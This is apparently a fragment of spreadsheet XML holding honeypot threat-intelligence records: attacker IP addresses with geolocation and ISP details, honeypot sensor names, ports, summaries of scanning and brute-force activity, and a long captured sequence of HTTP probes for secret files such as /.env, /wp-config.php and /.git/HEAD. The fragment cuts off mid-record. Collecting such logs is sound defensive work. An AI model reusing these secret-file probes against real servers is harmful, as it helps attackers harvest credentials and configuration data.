    <t>ceefc50dd2baf4e5c4f12f200ce33ca8</t>
  </si>
  <si>
    <t>117.232.61.45</t>
  </si>
  <si>
    <t>::ffff:75e8:3d2d</t>
  </si>
  <si>
    <t>149081de84dcf4a99885f193fb45c0df</t>
  </si>
  <si>
    <t>180.65.127.138</t>
  </si>
  <si>
    <t>23&amp;&amp;58185&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b441:7f8a</t>
  </si>
  <si>
    <t>44a0c651771f7c097b25cb4f41751918</t>
  </si>
  <si>
    <t>120.157.240.28</t>
  </si>
  <si>
    <t>1221</t>
  </si>
  <si>
    <t>ASN-TELSTRA</t>
  </si>
  <si>
    <t>Telstra Internet</t>
  </si>
  <si>
    <t>::ffff:789d:f01c</t>
  </si>
  <si>
    <t>The attacker is attempting to gather information about the network and its services, likely for reconnaissance purposes. They are probing various ports and services, including DNS, FTP, HTTP, HTTPS, IMAP, IPP, and others, using different protocols and syntaxes.</t>
  </si>
  <si>
    <t>They are also attempting to authenticate with certain services, such as SMB and SMTP, and are sending suspicious commands and data, indicating a potential malicious intent.</t>
  </si>
  <si>
    <t>4dd9d717231a6a7b7f8d95e15d51ced7</t>
  </si>
  <si>
    <t>103.94.2.230</t>
  </si>
  <si>
    <t>5900&amp;&amp;54494</t>
  </si>
  <si>
    <t>Pamulang</t>
  </si>
  <si>
    <t>1632937</t>
  </si>
  <si>
    <t>2017-05-30</t>
  </si>
  <si>
    <t>::ffff:675e:2e6</t>
  </si>
  <si>
    <t>The attacker is scanning for open services on the network, attempting to identify vulnerable systems and gain access. They are sending probes to various ports, gathering information about the target systems, including service versions and configurations. &amp;&amp; It appears that the attacker is conducting a reconnaissance and scanning activity, attempting to gather information about the system's services and configurations. They are likely using various protocols (such as DNS, HTTP, FTP, etc.) to probe for vulnerabilities and identify potential entry points. &amp;&amp; The attacker is scanning the network for available services and testing login credentials, likely using a brute force attack to gain unauthorized access. &amp;&amp; The attackers are attempting to gain unauthorized access and reconnaissance of the targeted systems, exploiting various vulnerabilities and weaknesses in the network services. They seem to be using a combination of automated tools and manual probing to identify potential entry points.</t>
  </si>
  <si>
    <t xml:space="preserve">Port scanning &amp;&amp;   &amp;&amp; UDP Flood &amp;&amp;  </t>
  </si>
  <si>
    <t>2d7cd73bd91485c3cd411aa1addfb1e7</t>
  </si>
  <si>
    <t>85.105.13.72</t>
  </si>
  <si>
    <t>::ffff:5569:d48</t>
  </si>
  <si>
    <t>The attacker is attempting to probe and exploit various services on the network, likely for reconnaissance or initial access purposes. They are sending requests to numerous ports and services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET.</t>
  </si>
  <si>
    <t xml:space="preserve"> Port scanning and enumeration</t>
  </si>
  <si>
    <t>c7a5785766ae8c4c80be050e2597c697</t>
  </si>
  <si>
    <t>27.111.74.1</t>
  </si>
  <si>
    <t>::ffff:1b6f:4a01</t>
  </si>
  <si>
    <t>Based on the logs, it appears that an attacker is attempting to enumerate and exploit various services on a network. They are using a variety of protocols, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, Redis, SIP, SMB, SMTP, SNMP, and others.</t>
  </si>
  <si>
    <t>The attacker is sending reconnaissance probes to identify open ports and services on the network. They are also attempting to authenticate with various usernames and passwords, including weak ones like "Administrator". Additionally, they are trying to exploit vulnerabilities in some of these services.</t>
  </si>
  <si>
    <t>7f6c7f76df1eba3cf707424193fb341f</t>
  </si>
  <si>
    <t>183.83.135.169</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_MT-CPA_H42</t>
  </si>
  <si>
    <t>1433&amp;&amp;22&amp;&amp;18072</t>
  </si>
  <si>
    <t>Malkajgiri</t>
  </si>
  <si>
    <t>7302828</t>
  </si>
  <si>
    <t>17.4478</t>
  </si>
  <si>
    <t>78.5263</t>
  </si>
  <si>
    <t>Beam-BRAS-Pools</t>
  </si>
  <si>
    <t>::ffff:b753:87a9</t>
  </si>
  <si>
    <t>The observed activities suggest that the attackers are attempting to reconnoiter and exploit various network services for potential vulnerabilities. They appear to be scanning for open ports, identifying service versions, and probing for login credentials. The presence of malicious user agent strings and unusual request patterns further indicates a reconnaissance phase aimed at gathering information for future attacks.</t>
  </si>
  <si>
    <t>57a1266a72dc12844c35da76a001249e</t>
  </si>
  <si>
    <t>152.58.186.81</t>
  </si>
  <si>
    <t>JH</t>
  </si>
  <si>
    <t>Jharkhand</t>
  </si>
  <si>
    <t>Bokaro</t>
  </si>
  <si>
    <t>Bhojudih</t>
  </si>
  <si>
    <t>1275866</t>
  </si>
  <si>
    <t>23.6396</t>
  </si>
  <si>
    <t>86.441</t>
  </si>
  <si>
    <t>Reliancejio</t>
  </si>
  <si>
    <t>::ffff:983a:ba51</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and exploit various network services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP. They are using tools to send probes and identify potential vulnerabilities in these services. &amp;&amp; The attacker is attempting to scan and identify available services on the network, probing various ports for open connections. They are also trying to authenticate with different usernames and passwords, and possibly attempting to exploit vulnerabilities in certain services.</t>
  </si>
  <si>
    <t>The attacker is likely performing a reconnaissance operation to gather information about the target network and systems, which can be used for further exploitation and attack. &amp;&amp; Port scanning is being performed on multiple services including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and MySQL. This activity indicates that the attacker is trying to gather information about the network infrastructure and identify potential entry points.</t>
  </si>
  <si>
    <t>a6c9e879783efad54339ed80398161c0</t>
  </si>
  <si>
    <t>196.191.104.16</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H37</t>
  </si>
  <si>
    <t>23&amp;&amp;16019&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:c4bf:6810</t>
  </si>
  <si>
    <t>95305760929628d33f725dad4d3a998b</t>
  </si>
  <si>
    <t>92.251.4.131</t>
  </si>
  <si>
    <t>NA&amp;&amp;c4-131.i07-2.onvol.net</t>
  </si>
  <si>
    <t>Malta</t>
  </si>
  <si>
    <t>55</t>
  </si>
  <si>
    <t>Is-Siġġiewi</t>
  </si>
  <si>
    <t>Siġġiewi</t>
  </si>
  <si>
    <t>2562504</t>
  </si>
  <si>
    <t>35.8556</t>
  </si>
  <si>
    <t>14.4364</t>
  </si>
  <si>
    <t>12709</t>
  </si>
  <si>
    <t>Melita Limited</t>
  </si>
  <si>
    <t>Melita Ltd</t>
  </si>
  <si>
    <t>Melita plc</t>
  </si>
  <si>
    <t>2007-11-23</t>
  </si>
  <si>
    <t>::ffff:5cfb:483</t>
  </si>
  <si>
    <t>6fa8f9ad9199bd5b774b0e536a6223b6</t>
  </si>
  <si>
    <t>27.34.34.171</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H33</t>
  </si>
  <si>
    <t>{'zen.spamhaus.org': ['exploits']}</t>
  </si>
  <si>
    <t>P7</t>
  </si>
  <si>
    <t>Sudurpashchim Pradesh</t>
  </si>
  <si>
    <t>Kailali</t>
  </si>
  <si>
    <t>Dhangadhi</t>
  </si>
  <si>
    <t>1283467</t>
  </si>
  <si>
    <t>28.7014</t>
  </si>
  <si>
    <t>80.5898</t>
  </si>
  <si>
    <t>2010-03-22</t>
  </si>
  <si>
    <t>WLINK_BROADBAND_DYNAMIC_BRAS-BTWL-01_DEFAULT-POOL-CGNAT-BYPASS</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (27.34.34.171,60827)}&amp;&amp;{Data_SMB:Incoming connection (27.34.34.171,61204)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:1b22:22ab</t>
  </si>
  <si>
    <t>a485ad1c3fc8b816fc2c337db479f05f</t>
  </si>
  <si>
    <t>193.242.194.87</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H29</t>
  </si>
  <si>
    <t>07</t>
  </si>
  <si>
    <t>Fars</t>
  </si>
  <si>
    <t>Shiraz (District 6)</t>
  </si>
  <si>
    <t>115019</t>
  </si>
  <si>
    <t>29.6901</t>
  </si>
  <si>
    <t>52.4613</t>
  </si>
  <si>
    <t>58331</t>
  </si>
  <si>
    <t>Rayaneh Asr-e Ertebat Bam Technology and Engineering Cooperative Co</t>
  </si>
  <si>
    <t>2012-06-26</t>
  </si>
  <si>
    <t>::ffff:c1f2:c257</t>
  </si>
  <si>
    <t>b949fbe7ab1a552a42149543a47715e0</t>
  </si>
  <si>
    <t>117.242.96.93</t>
  </si>
  <si>
    <t>::ffff:75f2:605d</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and gather information about the available services on the target system, as well as trying to authenticate and potentially gain unauthorized access to various systems. &amp;&amp; The attacker is attempting to scan and exploit various network services, including FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, SMB, SMTP, SNMP, and TELNET. They are also attempting to establish connections with various servers using different protocols.</t>
  </si>
  <si>
    <t xml:space="preserve"> Credential stuffing and brute force attack &amp;&amp; The attacker is likely conducting a reconnaissance phase of an attack, gathering information about the target network's services and potential vulnerabilities.</t>
  </si>
  <si>
    <t>70a3614e148a5cb595cf9ec9529bbfbc</t>
  </si>
  <si>
    <t>193.32.162.73</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H32</t>
  </si>
  <si>
    <t>25&amp;&amp;NA&amp;&amp;49624&amp;&amp;36124&amp;&amp;51836&amp;&amp;49786</t>
  </si>
  <si>
    <t>47890</t>
  </si>
  <si>
    <t>UNMANAGED LTD</t>
  </si>
  <si>
    <t>Unmanaged LTD</t>
  </si>
  <si>
    <t>Techoff SRV Limited</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}</t>
  </si>
  <si>
    <t>::ffff:c120:a249</t>
  </si>
  <si>
    <t>936593437b608026c3da06b26cee8cf6</t>
  </si>
  <si>
    <t>120.61.242.107</t>
  </si>
  <si>
    <t>::ffff:783d:f26b</t>
  </si>
  <si>
    <t>The attackers are likely scanning for open ports and vulnerable services, attempting to exploit potential weaknesses in the network. They are also trying to gain unauthorized access by sending malicious login attempts and exploiting weak passwords.</t>
  </si>
  <si>
    <t xml:space="preserve"> Port scanning</t>
  </si>
  <si>
    <t>34d88f41a016ea1509d198fc91bbf14d</t>
  </si>
  <si>
    <t>128.65.180.113</t>
  </si>
  <si>
    <t>2011-10-07</t>
  </si>
  <si>
    <t>::ffff:8041:b471</t>
  </si>
  <si>
    <t>The attackers are likely attempting to scan and exploit various network services, including FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, SIP, SMB, SMTP, SNMP, and TELNET. They are trying to access or manipulate sensitive data, such as usernames, passwords, and network configurations. &amp;&amp; The attacker is scanning and gathering information about the targeted system, likely for future exploitation. They are sending various types of malicious requests to different services such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, SMB, SMTP, SNMP, and TELNET.</t>
  </si>
  <si>
    <t>Reconnaissance &amp;&amp; **Port Scanning**</t>
  </si>
  <si>
    <t>72bb972b50e286a6ae641608a7cf6a18</t>
  </si>
  <si>
    <t>212.253.130.53</t>
  </si>
  <si>
    <t>Şişli</t>
  </si>
  <si>
    <t>750640</t>
  </si>
  <si>
    <t>41.0693</t>
  </si>
  <si>
    <t>29.0052</t>
  </si>
  <si>
    <t>34984</t>
  </si>
  <si>
    <t>Superonline Iletisim Hizmetleri A.S.</t>
  </si>
  <si>
    <t>Superonline R0</t>
  </si>
  <si>
    <t>::ffff:d4fd:8235</t>
  </si>
  <si>
    <t>cb7fb9b5ee20e5e542101361cf0d68a0</t>
  </si>
  <si>
    <t>218.39.178.122</t>
  </si>
  <si>
    <t>::ffff:da27:b27a</t>
  </si>
  <si>
    <t>The attacker is attempting to gather information about the services running on the target system, likely in preparation for a larger-scale attack. They are sending various probes and requests to each service, including login attempts, connection establishment, and data retrieval. The attacker appears to be using a mix of automated tools and manual efforts to exploit vulnerabilities.</t>
  </si>
  <si>
    <t xml:space="preserve">Port scanning </t>
  </si>
  <si>
    <t>6b844e8eaf8c9b7ca110b4f0dcdf259f</t>
  </si>
  <si>
    <t>128.185.196.22</t>
  </si>
  <si>
    <t>1986-12-23</t>
  </si>
  <si>
    <t>::ffff:80b9:c416</t>
  </si>
  <si>
    <t>The attacker is attempting to exploit various network services and protocols, likely for reconnaissance, scanning, or exploitation purposes. They are probing different ports and attempting to gain unauthorized access to systems.</t>
  </si>
  <si>
    <t>bc77e32222507a7540684f8c2982b447</t>
  </si>
  <si>
    <t>27.111.36.10</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_MSSQL_H33</t>
  </si>
  <si>
    <t>445&amp;&amp;1433&amp;&amp;65045</t>
  </si>
  <si>
    <t>KS</t>
  </si>
  <si>
    <t>South Kalimantan</t>
  </si>
  <si>
    <t>Kota Banjarmasin</t>
  </si>
  <si>
    <t>Banjarmasin</t>
  </si>
  <si>
    <t>1650213</t>
  </si>
  <si>
    <t>-3.31987</t>
  </si>
  <si>
    <t>114.591</t>
  </si>
  <si>
    <t>24532</t>
  </si>
  <si>
    <t>PT. Inet Global Indo</t>
  </si>
  <si>
    <t>INET-ISP</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (27.111.36.10,60182)}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:1b6f:240a</t>
  </si>
  <si>
    <t>acc880721b4b35e0829375d22a86faf1</t>
  </si>
  <si>
    <t>117.221.153.69</t>
  </si>
  <si>
    <t>::ffff:75dd:9945</t>
  </si>
  <si>
    <t>2da5cc3dd3bbea80fea42beb061dfa5f</t>
  </si>
  <si>
    <t>220.146.64.232</t>
  </si>
  <si>
    <t>NA&amp;&amp;aq064232.dynamic.ppp.asahi-net.or.jp</t>
  </si>
  <si>
    <t>35.6916</t>
  </si>
  <si>
    <t>139.768</t>
  </si>
  <si>
    <t>4685</t>
  </si>
  <si>
    <t>Asahi Net</t>
  </si>
  <si>
    <t>ASAHI Net, Inc.</t>
  </si>
  <si>
    <t>ASAHI</t>
  </si>
  <si>
    <t>::ffff:dc92:40e8</t>
  </si>
  <si>
    <t>c1c981a2b1b015b7979ff157a1871b6a</t>
  </si>
  <si>
    <t>170.39.218.202</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H34</t>
  </si>
  <si>
    <t>25&amp;&amp;80&amp;&amp;3306&amp;&amp;143&amp;&amp;110&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>52053</t>
  </si>
  <si>
    <t>REDHEBERG Association declaree</t>
  </si>
  <si>
    <t>FBW Reseaux Fibres inc.</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_SMTP:{'arg': '/.git/HEAD', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_SMTP:{'arg': '103.211.202.140', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'keep-alive', 'command': 'CONNECTION:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'gzip', 'command': 'ACCEPT-ENCODING:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': '', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': '94.131.8.76', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': '95.164.118.29', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': '109.123.229.33', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'method': 'GET', 'uri': '/.git/HEAD'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/httpd.conf'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/apps/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/php_info.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/api/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/blog/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env.production'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/protected/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/config/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/base/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env.development'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/v2/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/database/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/config/php.ini'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env.save'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/db_config.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/crm/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/laravel/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/system/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/api/config/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/app/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/admin/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/cgi-bin/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/_profiler/phpinfo'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/server/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/old/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env.json'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/api/env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/resources/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/info.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/wp-config.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/dev.php'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/httpd.conf'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/apps/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/php_info.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/api/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/blog/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env.production'}}&amp;&amp;{Data_SMTP:{'arg': '66.94.127.183', 'command': 